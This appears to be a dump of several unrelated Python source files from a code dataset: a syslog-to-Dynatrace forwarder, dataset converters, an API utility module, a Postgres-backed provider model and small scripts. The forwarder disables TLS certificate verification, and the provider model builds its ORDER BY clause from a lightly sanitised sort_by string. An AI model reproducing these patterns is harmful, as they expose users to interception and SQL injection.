11","sub_path":"skarabdefs.py","file_name":"skarabdefs.py","file_ext":"py","file_size_in_byte":27648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"282200669","text":"#!/usr/bin/env python\n\n# Tiny Syslog Server in Python.\n##\n# inspired by :\n# https://gist.github.com/marcelom/4218010 \n# https://github.com/choeffer/py3syslog\n\nimport os\nimport sys\nimport requests\nimport json\nimport configparser\nimport socketserver\nimport logging\n\n\nclass SyslogUDPHandler(socketserver.BaseRequestHandler):\n\n def handle(self):\n data = bytes.decode(self.request[0].strip())\n socket = self.request[1]\n #print(\"%s : \" % self.client_address[0], str(data))\n logging.info(str(data))\n self.sendtodynatrace(str(data),self.client_address[0], dtendpointurl,dttoken)\n\n # --------------------------------------------------------------------------------\n\n def sendtodynatrace(self, theresult, thesource, theurl, thetoken):\n\n thejson = [{\"content\": theresult,\"log.source\": thesource}]\n\n rdt = requests.post(\n theurl+'/api/v2/logs/ingest',\n data=json.dumps(thejson),\n headers={\n 'Authorization': \"Api-Token \" + thetoken,\n 'Content-Type': 'application/json; charset=utf-8',\n 'Accept': 'application/json; charset=utf-8',\n\n },\n verify=False\n )\n\n # error ?\n if(rdt.status_code != 204):\n logging.error(rdt.status_code, rdt.reason, rdt.text)\n else:\n logging.info(\"Successfully pushed log data to Dynatrace ingestion endpoint from \"+thesource+\".\")\n logging.debug(rdt.text)\n# --------------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n\n requests.packages.urllib3.disable_warnings()\n\n # open properties file\n config = configparser.ConfigParser()\n config.read(os.path.join(sys.path[0], \"config.properties\"))\n\n # get properties\n dttoken = config.get('dynatrace', 'dt_api_token')\n dtendpointurl = config.get('dynatrace', 'dt_endpoint_url')\n syslogip=config.get('syslog', 'syslog_ip')\n syslogport=int(config.get('syslog', 'syslog_port'))\n loggingpath=config.get('logging', 'logging_path')\n\n logging.basicConfig(filename=loggingpath,format='%(asctime)s %(message)s', level=logging.INFO)\n\n try:\n server = socketserver.UDPServer((syslogip, syslogport), SyslogUDPHandler)\n server.serve_forever(poll_interval=0.5)\n except (IOError, SystemExit):\n raise\n except KeyboardInterrupt:\n print(\"Crtl+C Pressed. 
Shutting down.\")\n","sub_path":"src/dtsyslogd.py","file_name":"dtsyslogd.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"318375436","text":"from pycocotools.coco import COCO\nfrom yolov3.cfg import COCO_ANN_FILE, COCO_CLASS, LABEL_FILE, IMG_SIZE\n\n\ndef convert(mode='train'):\n with open(LABEL_FILE[mode], 'w+') as f:\n coco = COCO(COCO_ANN_FILE[mode])\n catIds = coco.getCatIds(catNms=COCO_CLASS)\n\n cats = {}\n for cat in coco.loadCats(catIds):\n cats[cat['id']] = cat['name']\n\n imgIds = coco.getImgIds(catIds=catIds)\n for imgId in imgIds:\n img = coco.loadImgs(imgId)[0]\n\n img_file_name = img['file_name']\n w, h = img['width'], img['height']\n w_scale, h_scale = w / IMG_SIZE['width'], h / IMG_SIZE['height']\n\n annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\n anns = coco.loadAnns(annIds)\n\n f.write(img_file_name)\n for ann in anns:\n category_name = cats[ann['category_id']]\n cls = COCO_CLASS.index(category_name)\n\n _x1, _y1, _w, _h = ann['bbox']\n _cx, _cy = _x1 + _w / 2, _y1 + _h / 2\n cx, cy, w, h = _cx / w_scale, _cy / h_scale, _w / w_scale, _h / h_scale\n f.write(f\" {cls} {cx} {cy} {w} {h}\")\n f.write(\"\\n\")\n f.flush()\n\n\nif __name__ == \"__main__\":\n # convert(mode='train')\n convert(mode='val')\n","sub_path":"yolov3/coco_convert.py","file_name":"coco_convert.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"459859211","text":"from __future__ import print_function\n\nimport hmac\nimport logging\nimport sys\nimport os\nimport re\n\nimport oriskami\n\n\nORISKAMI_LOG = os.environ.get('ORISKAMI_LOG')\n\nlogger = logging.getLogger('oriskami')\n\n__all__ = [\n 'StringIO',\n 'json',\n 'utf8',\n 'log_info',\n 'log_debug',\n 'dashboard_link',\n 'logfmt',\n]\n\ntry:\n # When cStringIO is available\n import cStringIO as StringIO\nexcept ImportError:\n from io import StringIO\n\ntry:\n import json\nexcept ImportError:\n json = None\n\nif not (json and hasattr(json, 'loads')):\n try:\n import simplejson as json\n except ImportError:\n if not json:\n raise ImportError(\n \"Oriskami requires a JSON library, such as simplejson. \"\n \"HINT: Try installing the \"\n \"python simplejson library via 'pip install simplejson' or \"\n \"'easy_install simplejson', or contact support@oriskami.com \"\n \"with questions.\")\n else:\n raise ImportError(\n \"Oriskami requires a JSON library with the same interface as \"\n \"the Python 2.6 'json' library. You appear to have a 'json' \"\n \"library with a different interface. Please install \"\n \"the simplejson library. HINT: Try installing the \"\n \"python simplejson library via 'pip install simplejson' \"\n \"or 'easy_install simplejson', or contact support@oriskami.com\"\n \"with questions.\")\n\n\ndef utf8(value):\n # Note the ordering of these conditionals: `unicode` isn't a symbol in\n # Python 3 so make sure to check version before trying to use it. 
Python\n # 2to3 will also boil out `unicode`.\n if sys.version_info < (3, 0) and isinstance(value, unicode):\n return value.encode('utf-8')\n else:\n return value\n\n\ndef is_appengine_dev():\n return ('APPENGINE_RUNTIME' in os.environ and\n 'Dev' in os.environ.get('SERVER_SOFTWARE', ''))\n\n\ndef _console_log_level():\n if oriskami.log in ['debug', 'info']:\n return oriskami.log\n elif ORISKAMI_LOG in ['debug', 'info']:\n return ORISKAMI_LOG\n else:\n return None\n\n\ndef log_debug(message, **params):\n msg = logfmt(dict(message=message, **params))\n if _console_log_level() == 'debug':\n print(msg, file=sys.stderr)\n logger.debug(msg)\n\n\ndef log_info(message, **params):\n msg = logfmt(dict(message=message, **params))\n if _console_log_level() in ['debug', 'info']:\n print(msg, file=sys.stderr)\n logger.info(msg)\n\n\ndef _test_or_live_environment():\n if oriskami.api_key is None:\n return\n match = re.match(r'sk_(live|test)_', oriskami.api_key)\n if match is None:\n return\n return match.groups()[0]\n\n\ndef dashboard_link(request_id):\n return 'https://dashboard.oriskami.com/{env}/logs/{reqid}'.format(\n env=_test_or_live_environment() or 'test',\n reqid=request_id,\n )\n\n\ndef logfmt(props):\n def fmt(key, val):\n # Check if val is already a string to avoid re-encoding into\n # ascii. Since the code is sent through 2to3, we can't just\n # use unicode(val, encoding='utf8') since it will be\n # translated incorrectly.\n if re.search(r'\\s', str(val)):\n val = repr(val)\n # key should already be a string\n if re.search(r'\\s', key):\n key = repr(key)\n return u'{key}={val}'.format(key=key, val=val)\n return u' '.join([fmt(key, val) for key, val in sorted(props.items())])\n\n\n# Borrowed from Django's source code\nif hasattr(hmac, 'compare_digest'):\n # Prefer the stdlib implementation, when available.\n def secure_compare(val1, val2):\n return hmac.compare_digest(utf8(val1), utf8(val2))\nelse:\n def secure_compare(val1, val2):\n \"\"\"\n Returns True if the two strings are equal, False otherwise.\n The time taken is independent of the number of characters that match.\n For the sake of simplicity, this function executes in constant time\n only when the two strings have the same length. 
It short-circuits when\n they have different lengths.\n \"\"\"\n val1, val2 = utf8(val1), utf8(val2)\n if len(val1) != len(val2):\n return False\n result = 0\n if (sys.version_info[0] == 3 and isinstance(val1, bytes) and\n isinstance(val2, bytes)):\n for x, y in zip(val1, val2):\n result |= x ^ y\n else:\n for x, y in zip(val1, val2):\n result |= ord(x) ^ ord(y)\n return result == 0\n","sub_path":"oriskami/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423821231","text":"import random\n\nif __name__ == \"__main__\":\n\n metodos = [1, 2, 3]\n quantidades = [100, 1000, 10000, 100000, 471705]\n situacoes = [1, 2, 3]\n\n intercalacao_Ffitas = open(\n \"../../input/IntercalacaoFfitas/testes.txt\",\n \"w\",\n )\n intercalacao_2Ffitas = open(\n \"../../input/Intercalacao2Ffitas/testes.txt\",\n \"w\",\n )\n QuickExterno = open(\n \"../../input/QuicksortExterno/testes.txt\",\n \"w\",\n )\n\n for metodo in metodos:\n for situacao in situacoes:\n for quantidade in quantidades:\n\n if metodo == 1:\n intercalacao_2Ffitas.write(\n f\"./ordena {metodo} {quantidade} {situacao}\\n\"\n )\n\n elif metodo == 2:\n intercalacao_Ffitas.write(\n f\"./ordena {metodo} {quantidade} {situacao}\\n\"\n )\n elif metodo == 3:\n QuickExterno.write(f\"./ordena {metodo} {quantidade} {situacao}\\n\")\n\n intercalacao_Ffitas.close()\n intercalacao_2Ffitas.close()\n QuickExterno.close()\n","sub_path":"UFOP/Disciplinas/Terceiro Periodo/Estrutura de Dados II/TP2_20.2/scripts/InputsGenerator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616825865","text":"import os\nfrom collections import defaultdict\nimport sys\nimport math\nimport json\nimport shutil\nimport nGram\nimport subprocess\n\ndef ViterbiDivision(path):\n with open(path, \"r\") as f:\n with open(\"out.word\", \"w\") as fo:\n for line in f:\n line = line.strip()\n Graph = {}\n # create a graph\n for i in range(0, len(line)):\n tG = {}\n for j in range(i+1, len(line)+1):\n qw = line[i:j]\n ln = -math.log(nGram.probWord([qw]))\n if ln > math.log(nGram.nVirtualWords):\n ln = ln*len(qw) # this is an unknown word. 
Multiply by the length to restrict the length of unknown words to 1 in the Viterbi algorithm.\n\n                    tG[j] = ln\n\n                Graph[i] = tG\n            # Execute the Viterbi algorithm.\n            best_score = {}\n            best_edge = {}\n            best_score[0] = 0\n            for i in range(1, len(line)+1):\n                best_score[i] = math.inf\n                for j in range(0, i):\n                    score = best_score[j] + Graph[j][i]\n                    if score < best_score[i]:\n                        best_score[i] = score\n                        best_edge[i] = j\n            words = []\n            i = len(line)\n            while True:\n                j = best_edge[i]\n                words.append(line[j:i])\n                i = j\n                if i == 0:\n                    break\n            words.reverse()\n\n\n            oStr = \"\"\n            for w in words:\n                oStr = oStr + w + \" \"\n            print(oStr, file=fo)\n\n\na = 3\nif a == 1:\n    with open(\"../../test/04-model.txt\", \"r\") as f:\n        nGram.gN = 1\n        nGram.mnGram = nGram.c_nGram(0.98)\n        nGram.mnGram.prob = 1/nGram.nVirtualWords\n\n        for line in f:\n            line = line.strip()\n            line = line.split(\"\\t\")\n            print(line)\n            nGram.mnGram.w_prev[line[0]].prob = float(line[1])\n\n    ViterbiDivision(\"../../test/04-input.txt\")\n\nelif a == 2:\n    nGram.gN = 1\n    nGram.mnGram = nGram.c_nGram(0.95)\n    nGram.Train(\"04-train.word\")\n    ViterbiDivision(\"04-input.txt\")\n\n\n# test 2, practice of tutorial 3 using a Wikipedia dataset.\nelif a == 3:\n    nGram.gN = 1\n    nGram.nVirtualWords = 1000000\n    nGram.mnGram = nGram.c_nGram(0.95)\n    nGram.Train(\"../../data/wiki-ja-train.word\")\n    ViterbiDivision(\"../../data/wiki-ja-test.txt\")\n    subprocess.call([\"perl\", \"../gradews.pl\",\"../../data/wiki-ja-test.word\",\"out.word\"])\n\n    # Sent Accuracy: 0.00% (/84)\n    # Word Prec: 79.78% (1925/2413)\n    # Word Rec: 83.44% (1925/2307)\n    # F-meas: 81.57%\n    # Bound Accuracy: 88.72% (2862/3226)\nelse:\n    with open(\"big-ws-model.txt\", \"r\") as f:\n        nGram.gN = 1\n        nGram.mnGram = nGram.c_nGram(0.98)\n        nGram.mnGram.prob = 1/nGram.nVirtualWords\n\n        for line in f:\n            line = line.strip()\n            line = line.split(\"\\t\")\n            nGram.mnGram.w_prev[line[0]].prob = float(line[1])\n\n    ViterbiDivision(\"../../data/wiki-ja-test.txt\")\n    subprocess.call([\"perl\", \"../gradews.pl\",\"../../data/wiki-ja-test.word\",\"out.word\"])\n    # Sent Accuracy: 0.00% (/84)\n    # Word Prec: 74.24% (1919/2585)\n    # Word Rec: 83.18% (1919/2307)\n    # F-meas: 78.45%\n    # Bound Accuracy: 86.05% (2776/3226)\n","sub_path":"hShibata/tutorial03/wtest.py","file_name":"wtest.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"605130302","text":"from db import *\nimport datetime\n\n\nclass Provider(object):\n    def __init__(self, id_provider=None, db_row=None):\n        self.facility_types = []\n        self.organization_types = []\n        self.specialty_types = []\n\n        if db_row != None:\n            self.fill_from_data_row(db_row)\n        elif id_provider != None:\n            rows, _ = self.db_select(id_provider=id_provider)\n            if len(rows) == 0:\n                raise KeyError(\"row not found\")\n            self.fill_from_data_row(rows[0])\n        self.fill_types()\n\n    def fill_from_data_row(self, row):\n        self.id_provider = row[\"id_provider\"]\n        self.id_user = row[\"id_member\"]\n        self.id_provider_type = row[\"id_provider_type\"]\n        self.name = row[\"name\"]\n        self.address_street1 = row[\"address_street1\"]\n        self.address_street2 = row[\"address_street2\"]\n        self.address_zipcode = row[\"address_zipcode\"]\n        self.address_city = row[\"address_city\"]\n        self.address_state = row[\"address_state\"]\n        self.contact_name = row[\"contact_name\"]\n        self.email = row[\"email\"]\n        self.website = row[\"website\"]\n        self.phone_number = row[\"phone_number\"]\n        self.doctor_firstname = row[\"doctor_firstname\"]\n        
self.doctor_lastname = row[\"doctor_lastname\"]\n self.doctor_middlename = row[\"doctor_middlename\"]\n self.doctor_name = row[\"doctor_name\"]\n self.doctor_gender = row[\"doctor_gender\"]\n self.provider_type = row[\"provider_type\"]\n self.specialty_type = row[\"specialty_type\"]\n self.likes = row[\"likes\"]\n \n if row[\"distance_miles\"]:\n self.distance_miles = float(row[\"distance_miles\"])\n else:\n self.distance_miles = None\n\n if row[\"lat\"] and row[\"lng\"]:\n self.lat = float(row[\"lat\"])\n self.lng = float(row[\"lng\"])\n else:\n self.lat = None\n self.lng = None\n\n\n def fill_types(self):\n self.facility_types = []\n\n rows = pg_select_rows(\"select id_facility_type from provider_facility_type where id_provider = %s\", (self.id_provider, ))\n for row in rows:\n self.facility_types.append(row[\"id_facility_type\"])\n\n self.organization_types = []\n\n rows = pg_select_rows(\"select id_organization_type from provider_organization_type where id_provider = %s\", (self.id_provider, ))\n for row in rows:\n self.organization_types.append(row[\"id_organization_type\"]) \n\n self.specialty_types = []\n\n rows = pg_select_rows(\"select id_specialty_type from provider_specialty_type where id_provider = %s\", (self.id_provider, ))\n for row in rows:\n self.specialty_types.append(row[\"id_specialty_type\"]) \n\n\n def insert(self): \n self.id_provider = pg_execute(\"\\\n insert into provider(\\\n id_member,\\\n id_provider_type,\\\n name,\\\n address_street1,\\\n address_street2,\\\n address_zipcode,\\\n address_city,\\\n address_state,\\\n lat,\\\n lng,\\\n contact_name,\\\n email,\\\n website,\\\n phone_number,\\\n doctor_firstname,\\\n doctor_lastname,\\\n doctor_middlename,\\\n doctor_name,\\\n doctor_gender\\\n )\\\n values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) returning id_provider\", \n (\n self.id_user,\n self.id_provider_type,\n self.name,\n self.address_street1,\n self.address_street2,\n self.address_zipcode,\n self.address_city,\n self.address_state,\n self.lat,\n self.lng,\n self.contact_name,\n self.email,\n self.website,\n self.phone_number,\n self.doctor_firstname,\n self.doctor_lastname,\n self.doctor_middlename,\n self.doctor_name,\n self.doctor_gender\n ))\n\n self.save_types()\n\n\n def update(self):\n pg_execute(\"\\\n update\\\n provider\\\n set\\\n id_member = %s,\\\n id_provider_type = %s,\\\n name = %s,\\\n address_street1 = %s,\\\n address_street2 = %s,\\\n address_zipcode = %s,\\\n address_city = %s,\\\n address_state = %s,\\\n lat = %s,\\\n lng = %s,\\\n contact_name = %s,\\\n email = %s,\\\n website = %s,\\\n phone_number = %s,\\\n doctor_firstname = %s,\\\n doctor_lastname = %s,\\\n doctor_middlename = %s,\\\n doctor_name = %s,\\\n doctor_gender = %s,\\\n likes = %s\\\n where\\\n id_provider = %s\",\n (\n self.id_user,\n self.id_provider_type,\n self.name,\n self.address_street1,\n self.address_street2,\n self.address_zipcode,\n self.address_city,\n self.address_state,\n self.lat,\n self.lng,\n self.contact_name,\n self.email,\n self.website,\n self.phone_number,\n self.doctor_firstname,\n self.doctor_lastname,\n self.doctor_middlename,\n self.doctor_name,\n self.doctor_gender,\n self.likes,\n self.id_provider))\n\n self.save_types()\n\n def delete(self): \n pg_execute(\"delete from provider where id_provider = %s\", (self.id_provider, ))\n\n def reload(self):\n rows, _ = self.db_select(id_provider=self.id_provider)\n self.fill_from_data_row(rows[0])\n\n def save_types(self):\n pg_execute(\"delete from 
provider_facility_type where id_provider = %s\", (self.id_provider, ))\n pg_execute(\"delete from provider_organization_type where id_provider = %s\", (self.id_provider, ))\n pg_execute(\"delete from provider_specialty_type where id_provider = %s\", (self.id_provider, ))\n\n for id in self.facility_types:\n pg_execute(\"insert into provider_facility_type(id_provider, id_facility_type) values (%s, %s)\", (self.id_provider, id))\n\n for id in self.organization_types:\n pg_execute(\"insert into provider_organization_type(id_provider, id_organization_type) values (%s, %s)\", (self.id_provider, id))\n \n for id in self.specialty_types:\n pg_execute(\"insert into provider_specialty_type(id_provider, id_specialty_type) values (%s, %s)\", (self.id_provider, id))\n \n # @staticmethod\n # def like(id_provider):\n # rows = pg_select_rows(\"select id_provider from provider where id_provider = %s\", (id_provider, ))\n \n # if len(rows) == 0:\n # return None\n\n # pg_execute(\"update provider set likes = likes + 1 where id_provider = %s\", (id_provider, ))\n \n # return Provider(id_provider=id_provider)\n \n\n @staticmethod\n def db_select(id_provider = None,\n location_lat = None,\n location_lng = None,\n location_distance = None,\n name = None,\n id_provider_type = None,\n id_specialty_type = None,\n id_facility_type = None,\n id_organization_type = None,\n id_user = None,\n sort_by = None,\n results_page = None,\n results_page_size = None):\n\n order_string=\" order by case when p.lat is null or p.lng is null then 2 else 1 end, distance_miles, coalesce(concat(p.doctor_lastname, ' ', coalesce(p.doctor_middlename, ''), ' ', p.doctor_firstname), p.name), p.id_provider\"\n\n if sort_by:\n sort_by_sanitized=sort_by.replace(\"'\", \"\").replace('\"', '')\n order_string=\" order by {0}, p.id_provider\".format(sort_by_sanitized)\n\n limit_string=\"\"\n\n if results_page and results_page_size:\n start_record=(results_page - 1) * results_page_size\n limit_string=\" offset {0} limit {1}\".format(\n int(start_record), int(results_page_size))\n else:\n limit_string = \" limit 2\"\n\n if name:\n name = \"%{0}%\".format(name)\n\n return pg_select_rows_with_count(\"\\\n select\\\n count(*) over() as row_count,\\\n p.id_provider,\\\n p.id_provider_type,\\\n p.name,\\\n p.address_street1,\\\n p.address_street2,\\\n p.address_zipcode,\\\n p.address_city,\\\n p.address_state,\\\n p.lat,\\\n p.lng,\\\n p.contact_name,\\\n p.email,\\\n p.website,\\\n p.phone_number,\\\n p.doctor_firstname,\\\n p.doctor_lastname,\\\n p.doctor_middlename,\\\n p.doctor_name,\\\n p.doctor_gender,\\\n p.id_member,\\\n p.likes,\\\n pt.name as provider_type,\\\n (select string_agg(name, ', ') from specialty_type st inner join provider_specialty_type pst on pst.id_specialty_type = st.id_specialty_type where pst.id_provider = p.id_provider) as specialty_type,\\\n case when %(location_lat)s is null or %(location_lng)s is null then 0 else ST_Distance(st_makepoint(%(location_lat)s, %(location_lng)s)::geography, st_makepoint(p.lat, p.lng)::geography) / 1609.34 end as distance_miles\\\n from\\\n provider p\\\n inner join\\\n provider_type pt on pt.id_provider_type = p.id_provider_type\\\n left join\\\n member m on m.id_member = %(id_user)s\\\n where\\\n (%(id_provider)s is null or p.id_provider = %(id_provider)s)\\\n and (%(id_user)s is null or p.id_member = %(id_user)s or m.id_member_role = 1)\\\n and (%(id_provider_type)s is null or p.id_provider_type = %(id_provider_type)s)\\\n and (%(id_organization_type)s is null or %(id_organization_type)s in 
(select pot.id_organization_type from provider_organization_type pot where pot.id_provider = p.id_provider))\\\n and (%(id_facility_type)s is null or %(id_facility_type)s in (select pft.id_facility_type from provider_facility_type pft where pft.id_provider = p.id_provider))\\\n and (%(id_specialty_type)s is null or %(id_specialty_type)s in (select pst.id_specialty_type from provider_specialty_type pst where pst.id_provider = p.id_provider))\\\n and (%(name)s is null or %(name)s = '' or p.name ilike %(name)s or p.doctor_name ilike %(name)s)\\\n and (%(location_lat)s is null or %(location_lng)s is null or %(location_distance)s is null or case when %(location_lat)s is null or %(location_lng)s is null then 0 else ST_Distance(st_makepoint(%(location_lat)s, %(location_lng)s)::geography, st_makepoint(p.lat, p.lng)::geography) / 1609.34 end <= %(location_distance)s)\\\n {0} {1}\\\n \".format(order_string, limit_string),\n {\"id_provider\": id_provider,\n \"id_provider_type\": id_provider_type,\n \"id_organization_type\": id_organization_type,\n \"id_facility_type\": id_facility_type,\n \"id_specialty_type\": id_specialty_type,\n \"name\": \"%{0}%\".format(name) if name != None and name != '' else None,\n \"location_lat\": location_lat,\n \"location_lng\": location_lng,\n \"location_distance\": location_distance,\n \"id_user\": id_user}\n )\n\n @staticmethod\n def get_providers(location_lat=None,\n location_lng=None,\n location_distance=None,\n name=None,\n id_provider_type=None,\n id_specialty_type=None,\n id_facility_type=None,\n id_organization_type=None,\n id_user=None,\n sort_by=None,\n results_page=None,\n results_page_size=None):\n\n providers = []\n\n rows, row_count = Provider.db_select(\n location_lat=location_lat,\n location_lng=location_lng,\n location_distance=location_distance,\n name=name,\n id_provider_type=id_provider_type,\n id_specialty_type=id_specialty_type,\n id_facility_type=id_facility_type,\n id_organization_type=id_organization_type,\n id_user=id_user,\n sort_by=sort_by,\n results_page=results_page,\n results_page_size=results_page_size)\n\n for row in rows:\n provider = Provider()\n provider.fill_from_data_row(row)\n providers.append(provider)\n\n return providers, row_count\n","sub_path":"api/model/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":12953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"409723023","text":"#! 
python3\n# imgurSearch.py\n# Opens the first five images corresponding to the user-inputted search terms\n\nimport logging, webbrowser, sys, requests, bs4\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# Search imgur for search terms\nres = requests.get('http://imgur.com/search/score?q=' + ' '.join(sys.argv[1:]))\nres.raise_for_status()\n\n# Grab HTML\nsoup = bs4.BeautifulSoup(res.text, 'html.parser')\n\n# Select elements with the image-list-link class\nimageLinks = soup.select('.image-list-link')\n\n# Determine the number of links to open\nnumOpen = min(5, len(imageLinks))\n\n# Open links\nfor i in range(numOpen):\n    webbrowser.open('https://imgur.com' + imageLinks[i].get('href'))\n\n\n\n\n\n\n\n\n\n","sub_path":"imgurSearch.py","file_name":"imgurSearch.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"534508775","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('api', '0018_daily_evangel_report_service'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='evangel_diary',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('content', models.TextField(default=b'')),\n                ('created', models.DateTimeField(default=django.utils.timezone.now, editable=False)),\n                ('members', models.ForeignKey(to='api.members')),\n            ],\n        ),\n    ]\n","sub_path":"api/migrations/0019_evangel_diary.py","file_name":"0019_evangel_diary.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"100537224","text":"from flask import Flask, render_template\n\napp = Flask(__name__)\n\nusers = {\n    'trang' : {\n        'name': 'Trang',\n        'age': 19,\n        'pet': '1 dog'\n    },\n    'xuxu123' : {\n        'name': 'Anh',\n        'age': 99,\n        'pet': '2 turtles'\n    },\n    'kiki345' : {\n        'name': 'Ly',\n        'age': 10,\n        'pet': 'None'\n    }\n}\n\n@app.route('/user/<username>')\ndef info(username):\n    if username in users:\n        usr = users[username]\n        return render_template('user.html', USER = usr)\n    else:\n        return 'User not found'\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","sub_path":"lesson7/hw/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"192134104","text":"# Text recognition from images using Pytesseract lib\n\nimport pytesseract\npytesseract.pytesseract.tesseract_cmd = r'D:\\installations\\pytesseract\\inst\\Tesseract-OCR\\tesseract.exe'\nimport cv2\nfrom PIL import Image\nimport tensorflow as tf\n\n# Read and display image\nimage = cv2.imread('sample3.jpg')\nimg_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n# Some functions of tesseract\nprint(pytesseract.image_to_string(img_rgb)) # Prints out the text\nprint(pytesseract.get_languages(config='')) # List of available languages\n\n#--------- Prints out the letters and corresponding coordinates and create BB around them ------\n\nprint(pytesseract.image_to_boxes(img_rgb)) # Prints out the letters and corresponding coordinates\nbounding_box_coordinates = pytesseract.image_to_boxes(img_rgb)\nimage_h, image_w, _ = img_rgb.shape\nfor bounding_box in bounding_box_coordinates.splitlines():\n    print(type(bounding_box)) # string class\n    print(bounding_box)\n    
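# image_to_boxes yields one line per character in the form \"char x1 y1 x2 y2 page\",\n    # with y measured from the bottom edge of the image -- hence the image_h - y\n    # flips below when drawing with OpenCV's top-left origin.\n    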
bounding_box = bounding_box.split(' ')\n    x1,y1,x2,y2 = int(bounding_box[1]), int(bounding_box[2]),int(bounding_box[3]),int(bounding_box[4])\n\n    cv2.rectangle(img_rgb, (x1,image_h-y1), (x2,image_h-y2), (0,0,255), thickness=3)\n\ncv2.namedWindow('image', flags=cv2.WINDOW_NORMAL) # WINDOW_NORMAL or WINDOW_AUTOSIZE\ncv2.imshow('image', img_rgb)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"pytesseract_text_recogn.py","file_name":"pytesseract_text_recogn.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"536726036","text":"#Write a program that reads an integer (variable limite) and an increment (variable salto), and\n#prints the integers from 0 up to and including limite, stepping by salto. Assume that limite and\n#salto are greater than zero. Examples:\n#▪ Values read: 30 (limite) 5 (salto)\n#▪ Algorithm output: 0 5 10 15 20 25 30\n#▪ Values read: 10 (limite) 3 (salto)\n#▪ Algorithm output: 0 3 6 9\n\nnumint=int(input(\"Enter an integer:\"))\nincr=int(input(\"Enter an increment:\"))\n\nfor u in range(0, numint+1, incr):\n    print(u)\n","sub_path":"exe3.py","file_name":"exe3.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"83335748","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec  3 08:22:39 2019\n\n@author: edwin\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 08:20:37 2019\n\n@author: edwin\n\"\"\"\n\nimport pandas as pd\nimport os\nimport numpy as np\nimport sqlite3\nimport mysql\n\n\n# Pandas can read JSON, CSV, HTML, XML....\n# Binary files as well\n\npath = './data/artwork_data.csv'\n\ncolumnas = ['id', 'artist', 'title', 'medium', 'year', \n            'acquisitionYear', 'height', 'width', 'units']\n\ndf = pd.read_csv(path, nrows = 10)\n\ndf2 = pd.read_csv(path, nrows=10, usecols=columnas)\n\ndf3 = pd.read_csv(path, nrows=10, usecols=columnas, index_col = 'id')\n\ndf4 = pd.read_csv(path)\n\npath_guardado = './data/artwork_data.pickle'\npath_guardado_complete = './data/artwork_data_complete.pickle'\n\ndf3.to_pickle(path_guardado)\ndf4.to_pickle(path_guardado_complete)\ndf5 = pd.read_pickle(path_guardado)\n\n\n\n##############\n\npath_guardado = './data/artwork_data.pickle'\ndf5 = pd.read_pickle(path_guardado)\n\n\npath = './data/artwork_data.csv'\npath_archivo_guardado = 'mi_datafame_completo.xls'\ndf4 = pd.read_csv(path)\n\ndf = df4.iloc[4990:50019,:].copy()\n\ndf.to_excel(path_archivo_guardado, index = False)\n\n# we want to show only certain columns\ncolumnas = ['artist', 'title', 'year']\ndf.to_excel(path_archivo_guardado, columns = columnas ,index = False)\n\n\n# multiple sheets\npath_multiple = 'mi_datafame_completo_multiple.xls'\n\nwriter = pd.ExcelWriter(path_multiple, engine = 'xlsxwriter')\n\n#define our sheets\ndf.to_excel(writer, sheet_name = 'Primera')\ndf.to_excel(writer, sheet_name = 'Segunda', index = False)\ndf.to_excel(writer, sheet_name = 'Tercera', columns = columnas)\nwriter.save()\n\n\n\n# number of artists\nnum_artistas = df['artist'].value_counts()\n\n\n# colors\npath_colores = 'mi_datafame_completo_colores.xls'\nwriter = pd.ExcelWriter(path_colores, engine = 'xlsxwriter')\nnum_artistas.to_excel(writer, sheet_name = 'Artistas')\n\nhoja_de_artistas = writer.sheets['Artistas']\n\nrango_de_celdas = 'B2:B{}'.format(len(num_artistas.index) + 1)\n\n#create the 
